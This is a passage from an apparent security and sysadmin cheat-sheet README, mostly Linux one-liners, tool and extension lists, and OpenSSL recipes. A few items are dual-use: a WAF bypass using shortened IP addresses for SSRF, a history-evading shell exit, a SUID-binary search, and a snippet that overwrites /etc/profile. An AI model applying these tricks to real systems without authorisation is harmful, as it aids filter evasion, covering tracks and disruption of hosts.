&nbsp;&nbsp;:small_orange_diamond: <a href="https://nfsec.pl/"><b>nf.sec</b></a> - basic aspects and mechanisms of Linux operating system security (PL).<br> </p> ##### :black_small_square: Other/All-in-one <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://changelog.com/"><b>Changelog</b></a> - is a community of hackers; news & podcasts for developers and hackers.<br> </p> #### Other Cheat Sheets &nbsp;[<sup>[TOC]</sup>](#anger-table-of-contents) ###### Build your own DNS Servers <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://calomel.org/unbound_dns.html"><b>Unbound DNS Tutorial</b></a> - a validating, recursive, and caching DNS server.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.ctrl.blog/entry/knot-dns-resolver-tutorial.html"><b>Knot Resolver on Fedora</b></a> - how to get faster and more secure DNS resolution with Knot Resolver on Fedora.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.aaflalo.me/2018/10/tutorial-setup-dns-over-https-server/"><b>DNS-over-HTTPS</b></a> - tutorial to setup your own DNS-over-HTTPS (DoH) server.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://hacks.mozilla.org/2018/05/a-cartoon-intro-to-dns-over-https/"><b>dns-over-https</b></a> - a cartoon intro to DNS over HTTPS.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.aaflalo.me/2019/03/dns-over-tls/"><b>DNS-over-TLS</b></a> - following to your DoH server, setup your DNS-over-TLS (DoT) server.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://zwischenzugs.com/2018/01/26/how-and-why-i-run-my-own-dns-servers/"><b>DNS Servers</b></a> - how (and why) i run my own DNS Servers.<br> </p> ###### Build your own Certificate Authority <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://jamielinux.com/docs/openssl-certificate-authority/"><b>OpenSSL Certificate Authority</b></a> - build your own certificate authority (CA) using the OpenSSL tools.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/smallstep/certificates"><b>step-ca Certificate Authority</b></a> - build your own certificate authority (CA) using open source step-ca.<br> </p> ###### Build your own System/Virtual Machine <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/cfenollosa/os-tutorial"><b>os-tutorial</b></a> - how to create an OS from scratch.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://justinmeiners.github.io/lc3-vm/"><b>Write your Own Virtual Machine</b></a> - how to write your own virtual machine (VM).<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/cirosantilli/x86-bare-metal-examples"><b>x86 Bare Metal Examples</b></a> - dozens of minimal operating systems to learn x86 system programming.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/djhworld/simple-computer"><b>simple-computer</b></a> - the scott CPU from "But How Do It Know?" by J. Clark Scott.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://littleosbook.github.io/"><b>littleosbook</b></a> - the little book about OS development.<br> </p> ###### DNS Servers list (privacy) | <b><u>IP</u></b> | <b><u>URL</u></b> | | :--- | :--- | | **`84.200.69.80`** | [dns.watch](https://dns.watch/) | | **`94.247.43.254`** | [opennic.org](https://www.opennic.org/) | | **`64.6.64.6`** | [verisign.com](https://www.verisign.com/en_US/security-services/public-dns/index.xhtml) | | **`89.233.43.71`** | [censurfridns.dk](https://blog.uncensoreddns.org/) | | **`1.1.1.1`** | [cloudflare.com](https://1.1.1.1/) | | **`94.130.110.185`** | [dnsprivacy.at](https://dnsprivacy.at/) | ###### TOP Browser extensions | <b><u>Extension name</u></b> | <b><u>Description</u></b> | | :--- | :--- | | **`IPvFoo`** | Display the server IP address and HTTPS information across all page elements. | | **`FoxyProxy`** | Simplifies configuring browsers to access proxy-servers. | | **`HTTPS Everywhere`** | Automatically use HTTPS security on many sites. | | **`uMatrix`** | Point & click to forbid/allow any class of requests made by your browser. | | **`uBlock Origin`** | An efficient blocker: easy on memory and CPU footprint. | | **`Session Buddy`** | Manage browser tabs and bookmarks with ease. | | **`SuperSorter`** | Sort bookmarks recursively, delete duplicates, merge folders, and more. | | **`Clear Cache`** | Clear your cache and browsing data. | | **`d3coder`** | Encoding/Decoding plugin for various types of encoding. | | **`Web Developer`** | Adds a toolbar button with various web developer tools. | | **`ThreatPinch Lookup`** | Add threat intelligence hover tool tips. | ###### TOP Burp extensions | <b><u>Extension name</u></b> | <b><u>Description</u></b> | | :--- | :--- | | **`Active Scan++`** | Extends Burp's active and passive scanning capabilities. | | **`Autorize`** | Automatically detects authorization enforcement. | | **`AuthMatrix`** | A simple matrix grid to define the desired levels of access privilege. | | **`Logger++`** | Logs requests and responses for all Burp tools in a sortable table. | | **`Bypass WAF`** | Adds headers useful for bypassing some WAF devices. | | **`JSON Beautifier`** | Beautifies JSON content in the HTTP message viewer. | | **`JSON Web Tokens`** | Enables Burp to decode and manipulate JSON web tokens. | | **`CSP Auditor`** | Displays CSP headers for responses, and passively reports CSP weaknesses. | | **`CSP-Bypass`** | Passively scans for CSP headers that contain known bypasses. | | **`Hackvertor`** | Converts data using a tag-based configuration to apply various encoding. | | **`HTML5 Auditor`** | Scans for usage of risky HTML5 features. | | **`Software Vulnerability Scanner`** | Vulnerability scanner based on vulners.com audit API. | | **`Turbo Intruder`** | Is a powerful bruteforcing tool. | | **`Upload Scanner`** | Upload a number of different file types, laced with different forms of payload. | ###### Hack Mozilla Firefox address bar In Firefox's address bar, you can limit results by typing special characters before or after your term: - `^` - for matches in your browsing history - `*` - for matches in your bookmarks. - `%` - for matches in your currently open tabs. - `#` - for matches in page titles. - `@` - for matches in web addresses. ###### Chrome hidden commands - `chrome://chrome-urls` - list of all commands - `chrome://flags` - enable experiments and development features - `chrome://interstitials` - errors and warnings - `chrome://net-internals` - network internals (events, dns, cache) - `chrome://network-errors` - network errors - `chrome://net-export` - start logging future network activity to a file - `chrome://safe-browsing` - safe browsing options - `chrome://user-actions` - record all user actions - `chrome://restart` - restart chrome - `chrome://dino` - ERR_INTERNET_DISCONNECTED... - `cache:<website-address>` - view the cached version of the web page ###### Bypass WAFs by Shortening IP Address (by [0xInfection](https://twitter.com/0xInfection)) IP addresses can be shortened by dropping the zeroes: ``` http://1.0.0.1 → http://1.1 http://127.0.0.1 → http://127.1 http://192.168.0.1 → http://192.168.1 http://0xC0A80001 or http://3232235521 → 192.168.0.1 http://192.168.257 → 192.168.1.1 http://192.168.516 → 192.168.2.4 ``` > This bypasses WAF filters for SSRF, open-redirect, etc where any IP as input gets blacklisted. For more information please see [How to Obscure Any URL](http://www.pc-help.org/obscure.htm) and [Magic IP Address Shortcuts](https://stuff-things.net/2014/09/25/magic-ip-address-shortcuts/). #### One-liners &nbsp;[<sup>[TOC]</sup>](#anger-table-of-contents) ##### Table of Contents * [terminal](#tool-terminal) * [busybox](#tool-busybox) * [mount](#tool-mount) * [fuser](#tool-fuser) * [lsof](#tool-lsof) * [ps](#tool-ps) * [top](#tool-top) * [vmstat](#tool-vmstat) * [iostat](#tool-iostat) * [strace](#tool-strace) * [kill](#tool-kill) * [find](#tool-find) * [diff](#tool-diff) * [vimdiff](#tool-vimdiff) * [tail](#tool-tail) * [cpulimit](#tool-cpulimit) * [pwdx](#tool-pwdx) * [tr](#tool-tr) * [chmod](#tool-chmod) * [who](#tool-who) * [last](#tool-last) * [screen](#tool-screen) * [script](#tool-script) * [du](#tool-du) * [inotifywait](#tool-inotifywait) * [openssl](#tool-openssl) * [secure-delete](#tool-secure-delete) * [dd](#tool-dd) * [gpg](#tool-gpg) * [system-other](#tool-system-other) * [curl](#tool-curl) * [httpie](#tool-httpie) * [ssh](#tool-ssh) * [linux-dev](#tool-linux-dev) * [tcpdump](#tool-tcpdump) * [tcpick](#tool-tcpick) * [ngrep](#tool-ngrep) * [hping3](#tool-hping3) * [nmap](#tool-nmap) * [netcat](#tool-netcat) * [socat](#tool-socat) * [p0f](#tool-p0f) * [gnutls-cli](#tool-gnutls-cli) * [netstat](#tool-netstat) * [rsync](#tool-rsync) * [host](#tool-host) * [dig](#tool-dig) * [certbot](#tool-certbot) * [network-other](#tool-network-other) * [git](#tool-git) * [awk](#tool-awk) * [sed](#tool-sed) * [grep](#tool-grep) * [perl](#tool-perl) ##### Tool: [terminal](https://en.wikipedia.org/wiki/Linux_console) ###### Reload shell without exit ```bash exec $SHELL -l ``` ###### Close shell keeping all subprocess running ```bash disown -a && exit ``` ###### Exit without saving shell history ```bash kill -9 $$ unset HISTFILE && exit ``` ###### Perform a branching conditional ```bash true && echo success false || echo failed ``` ###### Pipe stdout and stderr to separate commands ```bash some_command > >(/bin/cmd_for_stdout) 2> >(/bin/cmd_for_stderr) ``` ###### Redirect stdout and stderr each to separate files and print both to the screen ```bash (some_command 2>&1 1>&3 | tee errorlog ) 3>&1 1>&2 | tee stdoutlog ``` ###### List of commands you use most often ```bash history | \ awk '{CMD[$2]++;count++;}END { for (a in CMD)print CMD[a] " " CMD[a]/count*100 "% " a;}' | \ grep -v "./" | \ column -c3 -s " " -t | \ sort -nr | nl | head -n 20 ``` ###### Sterilize bash history ```bash function sterile() { history | awk '$2 != "history" { $1=""; print $0 }' | egrep -vi "\ curl\b+.*(-E|--cert)\b+.*\b*|\ curl\b+.*--pass\b+.*\b*|\ curl\b+.*(-U|--proxy-user).*:.*\b*|\ curl\b+.*(-u|--user).*:.*\b* .*(-H|--header).*(token|auth.*)\b+.*|\ wget\b+.*--.*password\b+.*\b*|\ http.?://.+:.+@.*\ " > $HOME/histbuff; history -r $HOME/histbuff; } export PROMPT_COMMAND="sterile" ``` > Look also: [A naive utility to censor credentials in command history](https://github.com/lbonanomi/go/blob/master/revisionist.go). ###### Quickly backup a file ```bash cp filename{,.orig} ``` ###### Empty a file (truncate to 0 size) ```bash >filename ``` ###### Delete all files in a folder that don't match a certain file extension ```bash rm !(*.foo|*.bar|*.baz) ``` ###### Pass multi-line string to a file ```bash # cat >filename ... - overwrite the file # cat >>filename ... - append to a file cat > filename << __EOF__ data data data __EOF__ ``` ###### Edit a file on a remote host using vim ```bash vim scp://user@host//etc/fstab ``` ###### Create a directory and change into it at the same time ```bash mkd() { mkdir -p "$@" && cd "$@"; } ``` ###### Convert uppercase files to lowercase files ```bash rename 'y/A-Z/a-z/' * ``` ###### Print a row of characters across the terminal ```bash printf "%`tput cols`s" | tr ' ' '#' ``` ###### Show shell history without line numbers ```bash history | cut -c 8- fc -l -n 1 | sed 's/^\s*//' ``` ###### Run command(s) after exit session ```bash cat > /etc/profile << __EOF__ _after_logout() { username=$(whoami) for _pid in $(ps afx | grep sshd | grep "$username" | awk '{print $1}') ; do kill -9 $_pid done } trap _after_logout EXIT __EOF__ ``` ###### Generate a sequence of numbers ```bash for ((i=1; i<=10; i+=2)) ; do echo $i ; done # alternative: seq 1 2 10 for ((i=5; i<=10; ++i)) ; do printf '%02d\n' $i ; done # alternative: seq -w 5 10 for i in {1..10} ; do echo $i ; done ``` ###### Simple Bash filewatching ```bash unset MAIL; export MAILCHECK=1; export MAILPATH='$FILE_TO_WATCH?$MESSAGE' ``` --- ##### Tool: [busybox](https://www.busybox.net/) ###### Static HTTP web server ```bash busybox httpd -p $PORT -h $HOME [-c httpd.conf] ``` ___ ##### Tool: [mount](https://en.wikipedia.org/wiki/Mount_(Unix)) ###### Mount a temporary ram partition ```bash mount -t tmpfs tmpfs /mnt -o size=64M ``` * `-t` - filesystem type * `-o` - mount options ###### Remount a filesystem as read/write ```bash mount -o remount,rw / ``` ___ ##### Tool: [fuser](https://en.wikipedia.org/wiki/Fuser_(Unix)) ###### Show which processes use the files/directories ```bash fuser /var/log/daemon.log fuser -v /home/supervisor ``` ###### Kills a process that is locking a file ```bash fuser -ki filename ``` * `-i` - interactive option ###### Kills a process that is locking a file with specific signal ```bash fuser -k -HUP filename ``` * `--list-signals` - list available signal names ###### Show what PID is listening on specific port ```bash fuser -v 53/udp ``` ###### Show all processes using the named filesystems or block device ```bash fuser -mv /var/www ``` ___ ##### Tool: [lsof](https://en.wikipedia.org/wiki/Lsof) ###### Show process that use internet connection at the moment ```bash lsof -P -i -n ``` ###### Show process that use specific port number ```bash lsof -i tcp:443 ``` ###### Lists all listening ports together with the PID of the associated process ```bash lsof -Pan -i tcp -i udp ``` ###### List all open ports and their owning executables ```bash lsof -i -P | grep -i "listen" ``` ###### Show all open ports ```bash lsof -Pnl -i ``` ###### Show open ports (LISTEN) ```bash lsof -Pni4 | grep LISTEN | column -t ``` ###### List all files opened by a particular command ```bash lsof -c "process" ``` ###### View user activity per directory ```bash lsof -u username -a +D /etc ``` ###### Show 10 largest open files ```bash lsof / | \ awk '{ if($7 > 1048576) print $7/1048576 "MB" " " $9 " " $1 }' | \ sort -n -u | tail | column -t ``` ###### Show current working directory of a process ```bash lsof -p <PID> | grep cwd ``` ___ ##### Tool: [ps](https://en.wikipedia.org/wiki/Ps_(Unix)) ###### Show a 4-way scrollable process tree with full details ```bash ps awwfux | less -S ``` ###### Processes per user counter ```bash ps hax -o user | sort | uniq -c | sort -r ``` ###### Show all processes by name with main header ```bash ps -lfC nginx ``` ___ ##### Tool: [find](https://en.wikipedia.org/wiki/Find_(Unix)) ###### Find files that have been modified on your system in the past 60 minutes ```bash find / -mmin 60 -type f ``` ###### Find all files larger than 20M ```bash find / -type f -size +20M ``` ###### Find duplicate files (based on MD5 hash) ```bash find -type f -exec md5sum '{}' ';' | sort | uniq --all-repeated=separate -w 33 ``` ###### Change permission only for files ```bash cd /var/www/site && find . -type f -exec chmod 766 {} \; cd /var/www/site && find . -type f -exec chmod 664 {} + ``` ###### Change permission only for directories ```bash cd /var/www/site && find . -type d -exec chmod g+x {} \; cd /var/www/site && find . -type d -exec chmod g+rwx {} + ``` ###### Find files and directories for specific user/group ```bash # User: find . -user <username> -print find /etc -type f -user <username> -name "*.conf" # Group: find /opt -group <group> find /etc -type f -group <group> -iname "*.conf" ``` ###### Find files and directories for all without specific user/group ```bash # User: find . \! -user <username> -print # Group: find . \! -group <group> ``` ###### Looking for files/directories that only have certain permission ```bash # User find . -user <username> -perm -u+rw # -rw-r--r-- find /home -user $(whoami) -perm 777 # -rwxrwxrwx # Group: find /home -type d -group <group> -perm 755 # -rwxr-xr-x ``` ###### Delete older files than 60 days ```bash find . -type f -mtime +60 -delete ``` ###### Recursively remove all empty sub-directories from a directory ```bash find . -depth -type d -empty -exec rmdir {} \; ``` ###### How to find all hard links to a file ```bash find </path/to/dir> -xdev -samefile filename ``` ###### Recursively find the latest modified files ```bash find . -type f -exec stat --format '%Y :%y %n' "{}" \; | sort -nr | cut -d: -f2- | head ``` ###### Recursively find/replace of a string with sed ```bash find . -not -path '*/\.git*' -type f -print0 | xargs -0 sed -i 's/foo/bar/g' ``` ###### Recursively find/replace of a string in directories and file names ```bash find . -depth -name '*test*' -execdir bash -c 'mv -v "$1" "${1//foo/bar}"' _ {} \; ``` ###### Recursively find suid executables ```bash find / \( -perm -4000 -o -perm -2000 \) -type f -exec ls -la {} \; ``` ___ ##### Tool: [top](https://en.wikipedia.org/wiki/Top_(software)) ###### Use top to monitor only all processes with the specific string ```bash top -p $(pgrep -d , <str>) ``` * `<str>` - process containing string (eg. nginx, worker) ___ ##### Tool: [vmstat](https://en.wikipedia.org/wiki/Vmstat) ###### Show current system utilization (fields in kilobytes) ```bash vmstat 2 20 -t -w ``` * `2` - number of times with a defined time interval (delay) * `20` - each execution of the command (count) * `-t` - show timestamp * `-w` - wide output * `-S M` - output of the fields in megabytes instead of kilobytes ###### Show current system utilization will get refreshed every 5 seconds ```bash vmstat 5 -w ``` ###### Display report a summary of disk operations ```bash vmstat -D ``` ###### Display report of event counters and memory stats ```bash vmstat -s ``` ###### Display report about kernel objects stored in slab layer cache ```bash vmstat -m ``` ##### Tool: [iostat](https://en.wikipedia.org/wiki/Iostat) ###### Show information about the CPU usage, and I/O statistics about all the partitions ```bash iostat 2 10 -t -m ``` * `2` - number of times with a defined time interval (delay) * `10` - each execution of the command (count) * `-t` - show timestamp * `-m` - fields in megabytes (`-k` - in kilobytes, default) ###### Show information only about the CPU utilization ```bash iostat 2 10 -t -m -c ``` ###### Show information only about the disk utilization ```bash iostat 2 10 -t -m -d ``` ###### Show information only about the LVM utilization ```bash iostat -N ``` ___ ##### Tool: [strace](https://en.wikipedia.org/wiki/Strace) ###### Track with child processes ```bash # 1) strace -f -p $(pidof glusterfsd) # 2) strace -f $(pidof php-fpm | sed 's/\([0-9]*\)/\-p \1/g') ``` ###### Track process with 30 seconds limit ```bash timeout 30 strace $(< /var/run/zabbix/zabbix_agentd.pid) ``` ###### Track processes and redirect output to a file ```bash ps auxw | grep '[a]pache' | awk '{print " -p " $2}' | \ xargs strace -o /tmp/strace-apache-proc.out ``` ###### Track with print time spent in each syscall and limit length of print strings ```bash ps auxw | grep '[i]init_policy' | awk '{print " -p " $2}' | \ xargs strace -f -e trace=network -T -s 10000 ``` ###### Track the open request of a network port ```bash strace -f -e trace=bind nc -l 80 ``` ###### Track the open request of a network port (show TCP/UDP) ```bash strace -f -e trace=network nc -lu 80 ``` ___ ##### Tool: [kill](https://en.wikipedia.org/wiki/Kill_(command)) ###### Kill a process running on port ```bash kill -9 $(lsof -i :<port> | awk '{l=$2} END {print l}') ``` ___ ##### Tool: [diff](https://en.wikipedia.org/wiki/Diff) ###### Compare two directory trees ```bash diff <(cd directory1 && find | sort) <(cd directory2 && find | sort) ``` ###### Compare output of two commands ```bash diff <(cat /etc/passwd) <(cut -f2 /etc/passwd) ``` ___ ##### Tool: [vimdiff](http://vimdoc.sourceforge.net/htmldoc/diff.html) ###### Highlight the exact differences, based on characters and words ```bash vimdiff file1 file2 ``` ###### Compare two JSON files ```bash vimdiff <(jq -S . A.json) <(jq -S . B.json) ``` ###### Compare Hex dump ```bash d(){ vimdiff <(f $1) <(f $2);};f(){ hexdump -C $1|cut -d' ' -f3-|tr -s ' ';}; d ~/bin1 ~/bin2 ``` ###### diffchar Save [diffchar](https://raw.githubusercontent.com/vim-scripts/diffchar.vim/master/plugin/diffchar.vim) @ `~/.vim/plugins` Click `F7` to switch between diff modes Usefull `vimdiff` commands: * `qa` to exit all windows * `:vertical resize 70` to resize window * set window width `Ctrl+W [N columns]+(Shift+)<\>` ___ ##### Tool: [tail](https://en.wikipedia.org/wiki/Tail_(Unix)) ###### Annotate tail -f with timestamps ```bash tail -f file | while read ; do echo "$(date +%T.%N) $REPLY" ; done ``` ###### Analyse an Apache access log for the most common IP addresses ```bash tail -10000 access_log | awk '{print $1}' | sort | uniq -c | sort -n | tail ``` ###### Analyse web server log and show only 5xx http codes ```bash tail -n 100 -f /path/to/logfile | grep "HTTP/[1-2].[0-1]\" [5]" ``` ___ ##### Tool: [tar](https://en.wikipedia.org/wiki/Tar_(computing)) ###### System backup with exclude specific directories ```bash cd / tar -czvpf /mnt/system$(date +%d%m%Y%s).tgz --directory=/ \ --exclude=proc/* --exclude=sys/* --exclude=dev/* --exclude=mnt/* . ``` ###### System backup with exclude specific directories (pigz) ```bash cd / tar cvpf /backup/snapshot-$(date +%d%m%Y%s).tgz --directory=/ \ --exclude=proc/* --exclude=sys/* --exclude=dev/* \ --exclude=mnt/* --exclude=tmp/* --use-compress-program=pigz . ``` ___ ##### Tool: [dump](https://en.wikipedia.org/wiki/Dump_(program)) ###### System backup to file ```bash dump -y -u -f /backup/system$(date +%d%m%Y%s).lzo / ``` ###### Restore system from lzo file ```bash cd / restore -rf /backup/system$(date +%d%m%Y%s).lzo ``` ___ ##### Tool: [cpulimit](http://cpulimit.sourceforge.net/) ###### Limit the cpu usage of a process ```bash cpulimit -p pid -l 50 ``` ___ ##### Tool: [pwdx](https://www.cyberciti.biz/faq/unix-linux-pwdx-command-examples-usage-syntax/) ###### Show current working directory of a process ```bash pwdx <pid> ``` ___ ##### Tool: [taskset](https://www.cyberciti.biz/faq/taskset-cpu-affinity-command/) ###### Start a command on only one CPU core ```bash taskset -c 0 <command> ``` ___ ##### Tool: [tr](https://en.wikipedia.org/wiki/Tr_(Unix)) ###### Show directories in the PATH, one per line ```bash tr : '\n' <<<$PATH ``` ___ ##### Tool: [chmod](https://en.wikipedia.org/wiki/Chmod) ###### Remove executable bit from all files in the current directory ```bash chmod -R -x+X * ``` ###### Restore permission for /bin/chmod ```bash # 1: cp /bin/ls chmod.01 cp /bin/chmod chmod.01 ./chmod.01 700 file # 2: /bin/busybox chmod 0700 /bin/chmod # 3: setfacl --set u::rwx,g::---,o::--- /bin/chmod ``` ___ ##### Tool: [who](https://en.wikipedia.org/wiki/Who_(Unix)) ###### Find last reboot time ```bash who -b ``` ###### Detect a user sudo-su'd into the current shell ```bash [[ $(who -m | awk '{ print $1 }') == $(whoami) ]] || echo "You are su-ed to $(whoami)" ``` ___ ##### Tool: [last](https://www.howtoforge.com/linux-last-command/) ###### Was the last reboot a panic? ```bash (last -x -f $(ls -1t /var/log/wtmp* | head -2 | tail -1); last -x -f /var/log/wtmp) | \ grep -A1 reboot | head -2 | grep -q shutdown && echo "Expected reboot" || echo "Panic reboot" ``` ___ ##### Tool: [screen](https://en.wikipedia.org/wiki/GNU_Screen) ###### Start screen in detached mode ```bash screen -d -m <command> ``` ###### Attach to an existing screen session ```bash screen -r -d <pid> ``` ___ ##### Tool: [script](https://en.wikipedia.org/wiki/Script_(Unix)) ###### Record and replay terminal session ```bash ### Record session # 1) script -t 2>~/session.time -a ~/session.log # 2) script --timing=session.time session.log ### Replay session scriptreplay --timing=session.time session.log ``` ___ ##### Tool: [du](https://en.wikipedia.org/wiki/GNU_Screen) ###### Show 20 biggest directories with 'K M G' ```bash du | \ sort -r -n | \ awk '{split("K M G",v); s=1; while($1>1024){$1/=1024; s++} print int($1)" "v[s]"\t"$2}' | \ head -n 20 ``` ___ ##### Tool: [inotifywait](https://en.wikipedia.org/wiki/GNU_Screen) ###### Init tool everytime a file in a directory is modified ```bash while true ; do inotifywait -r -e MODIFY dir/ && ls dir/ ; done; ``` ___ ##### Tool: [openssl](https://www.openssl.org/) ###### Testing connection to the remote host ```bash echo | openssl s_client -connect google.com:443 -showcerts ``` ###### Testing connection to the remote host (debug mode) ```bash echo | openssl s_client -connect google.com:443 -showcerts -tlsextdebug -status ``` ###### Testing connection to the remote host (with SNI support) ```bash echo | openssl s_client -showcerts -servername google.com -connect google.com:443 ``` ###### Testing connection to the remote host with specific ssl version ```bash openssl s_client -tls1_2 -connect google.com:443 ``` ###### Testing connection to the remote host with specific ssl cipher ```bash openssl s_client -cipher 'AES128-SHA' -connect google.com:443 ``` ###### Verify 0-RTT ```bash _host="example.com" cat > req.in << __EOF__ HEAD / HTTP/1.1 Host: $_host Connection: close __EOF__ openssl s_client -connect ${_host}:443 -tls1_3 -sess_out session.pem -ign_eof < req.in openssl s_client -connect ${_host}:443 -tls1_3 -sess_in session.pem -early_data req.in ``` ###### Generate private key without passphrase ```bash # _len: 2048, 4096 ( _fd="private.key" ; _len="2048" ; \ openssl genrsa -out ${_fd} ${_len} ) ``` ###### Generate private key with passphrase ```bash # _ciph: des3, aes128, aes256 # _len: 2048, 4096 ( _ciph="aes128" ; _fd="private.key" ; _len="2048" ; \ openssl genrsa -${_ciph} -out ${_fd} ${_len} ) ``` ###### Remove passphrase from private key ```bash ( _fd="private.key" ; _fd_unp="private_unp.key" ; \ openssl rsa -in ${_fd} -out ${_fd_unp} ) ``` ###### Encrypt existing private key with a passphrase ```bash # _ciph: des3, aes128, aes256 ( _ciph="aes128" ; _fd="private.key" ; _fd_pass="private_pass.key" ; \ openssl rsa -${_ciph} -in ${_fd} -out ${_fd_pass} ``` ###### Check private key ```bash ( _fd="private.key" ; \ openssl rsa -check -in ${_fd} ) ``` ###### Get public key from private key ```bash ( _fd="private.key" ; _fd_pub="public.key" ; \ openssl rsa -pubout -in ${_fd} -out ${_fd_pub} ) ``` ###### Generate private key and CSR ```bash ( _fd="private.key" ; _fd_csr="request.csr" ; _len="2048" ; \ openssl req -out ${_fd_csr} -new -newkey rsa:${_len} -nodes -keyout ${_fd} ) ``` ###### Generate CSR ```bash ( _fd="private.key" ; _fd_csr="request.csr" ; \ openssl req -out ${_fd_csr} -new -key ${_fd} ) ``` ###### Generate CSR (metadata from existing certificate) > Where `private.key` is the existing private key. As you can see you do not generate this CSR from your certificate (public key). Also you do not generate the "same" CSR, just a new one to request a new certificate. ```bash ( _fd="private.key" ; _fd_csr="request.csr" ; _fd_crt="cert.crt" ; \ openssl x509 -x509toreq -in ${_fd_crt} -out ${_fd_csr} -signkey ${_fd} ) ``` ###### Generate CSR with -config param ```bash ( _fd="private.key" ; _fd_csr="request.csr" ; \ openssl req -new -sha256 -key ${_fd} -out ${_fd_csr} \ -config <( cat << __EOF__ [req] default_bits = 2048 default_md = sha256 prompt = no distinguished_name = dn req_extensions = req_ext [ dn ] C = "<two-letter ISO abbreviation for your country>" ST = "<state or province where your organisation is legally located>" L = "<city where your organisation is legally located>" O = "<legal name of your organisation>" OU = "<section of the organisation>" CN = "<fully qualified domain name>" [ req_ext ] subjectAltName = @alt_names [ alt_names ] DNS.1 = <fully qualified domain name> DNS.2 = <next domain> DNS.3 = <next domain> __EOF__ )) ``` Other values in `[ dn ]`: ``` countryName = "DE" # C= stateOrProvinceName = "Hessen" # ST= localityName = "Keller" # L= postalCode = "424242" # L/postalcode= postalAddress = "Keller" # L/postaladdress= streetAddress = "Crater 1621" # L/street= organizationName = "apfelboymschule" # O= organizationalUnitName = "IT Department" # OU= commonName = "example.com" # CN= emailAddress = "webmaster@example.com" # CN/emailAddress= ``` Example of `oids` (you'll probably also have to make OpenSSL know about the new fields required for EV by adding the following under `[new_oids]`): ``` [req] ... oid_section = new_oids [ new_oids ] postalCode = 2.5.4.17 streetAddress = 2.5.4.9 ``` For more information please look at these great explanations: - [RFC 5280](https://tools.ietf.org/html/rfc5280) - [How to create multidomain certificates using config files](https://apfelboymchen.net/gnu/notes/openssl%20multidomain%20with%20config%20files.html) - [Generate a multi domains certificate using config files](https://gist.github.com/romainnorberg/464758a6620228b977212a3cf20c3e08) - [Your OpenSSL CSR command is out of date](https://expeditedsecurity.com/blog/openssl-csr-command/) - [OpenSSL example configuration file](https://www.tbs-certificats.com/openssl-dem-server-cert.cnf) ###### List available EC curves ```bash openssl ecparam -list_curves ``` ###### Print ECDSA private and public keys ```bash ( _fd="private.key" ; \ openssl ec -in ${_fd} -noout -text ) # For x25519 only extracting public key ( _fd="private.key" ; _fd_pub="public.key" ; \ openssl pkey -in ${_fd} -pubout -out ${_fd_pub} ) ``` ###### Generate ECDSA private key ```bash # _curve: prime256v1, secp521r1, secp384r1 ( _fd="private.key" ; _curve="prime256v1" ; \ openssl ecparam -out ${_fd} -name ${_curve} -genkey ) # _curve: X25519 ( _fd="private.key" ; _curve="x25519" ; \ openssl genpkey -algorithm ${_curve} -out ${_fd} ) ``` ###### Generate private key and CSR (ECC) ```bash # _curve: prime256v1, secp521r1, secp384r1 ( _fd="domain.com.key" ; _fd_csr="domain.com.csr" ; _curve="prime256v1" ; \ openssl ecparam -out ${_fd} -name ${_curve} -genkey ; \ openssl req -new -key ${_fd} -out ${_fd_csr} -sha256 ) ``` ###### Generate self-signed certificate ```bash # _len: 2048, 4096 ( _fd="domain.key" ; _fd_out="domain.crt" ; _len="2048" ; _days="365" ; \ openssl req -newkey rsa:${_len} -nodes \ -keyout ${_fd} -x509 -days ${_days} -out ${_fd_out} ) ``` ###### Generate self-signed certificate from existing private key ```bash # _len: 2048, 4096 ( _fd="domain.key" ; _fd_out="domain.crt" ; _days="365" ; \ openssl req -key ${_fd} -nodes \ -x509 -days ${_days} -out ${_fd_out} ) ``` ###### Generate self-signed certificate from existing private key and csr ```bash # _len: 2048, 4096 ( _fd="domain.key" ; _fd_csr="domain.csr" ; _fd_out="domain.crt" ; _days="365" ; \ openssl x509 -signkey ${_fd} -nodes \ -in ${_fd_csr} -req -days ${_days} -out ${_fd_out} ) ``` ###### Generate DH public parameters ```bash ( _dh_size="2048" ; \ openssl dhparam -out /etc/nginx/ssl/dhparam_${_dh_size}.pem "$_dh_size" ) ``` ###### Display DH public parameters ```bash openssl pkeyparam -in dhparam.pem -text ``` ###### Extract private key from pfx ```bash ( _fd_pfx="cert.pfx" ; _fd_key="key.pem" ; \ openssl pkcs12 -in ${_fd_pfx} -nocerts -nodes -out ${_fd_key} ) ``` ###### Extract private key and certs from pfx ```bash ( _fd_pfx="cert.pfx" ; _fd_pem="key_certs.pem" ; \ openssl pkcs12 -in ${_fd_pfx} -nodes -out ${_fd_pem} ) ``` ###### Extract certs from p7b ```bash # PKCS#7 file doesn't include private keys. ( _fd_p7b="cert.p7b" ; _fd_pem="cert.pem" ; \ openssl pkcs7 -inform DER -outform PEM -in ${_fd_p7b} -print_certs > ${_fd_pem}) # or: openssl pkcs7 -print_certs -in -in ${_fd_p7b} -out ${_fd_pem}) ``` ###### Convert DER to PEM ```bash ( _fd_der="cert.crt" ; _fd_pem="cert.pem" ; \ openssl x509 -in ${_fd_der} -inform der -outform pem -out ${_fd_pem} ) ``` ###### Convert PEM to DER ```bash ( _fd_der="cert.crt" ; _fd_pem="cert.pem" ; \ openssl x509 -in ${_fd_pem} -outform der -out ${_fd_der} ) ``` ###### Verification of the private key ```bash ( _fd="private.key" ; \ openssl rsa -noout -text -in ${_fd} ) ``` ###### Verification of the public key ```bash # 1) ( _fd="public.key" ; \ openssl pkey -noout -text -pubin -in ${_fd} ) # 2) ( _fd="private.key" ; \ openssl rsa -inform PEM -noout -in ${_fd} &> /dev/null ; \ if [ $? = 0 ] ; then echo -en "OK\n" ; fi ) ``` ###### Verification of the certificate ```bash ( _fd="certificate.crt" ; # format: pem, cer, crt \ openssl x509 -noout -text -in ${_fd} ) ``` ###### Verification of the CSR ```bash ( _fd_csr="request.csr" ; \ openssl req -text 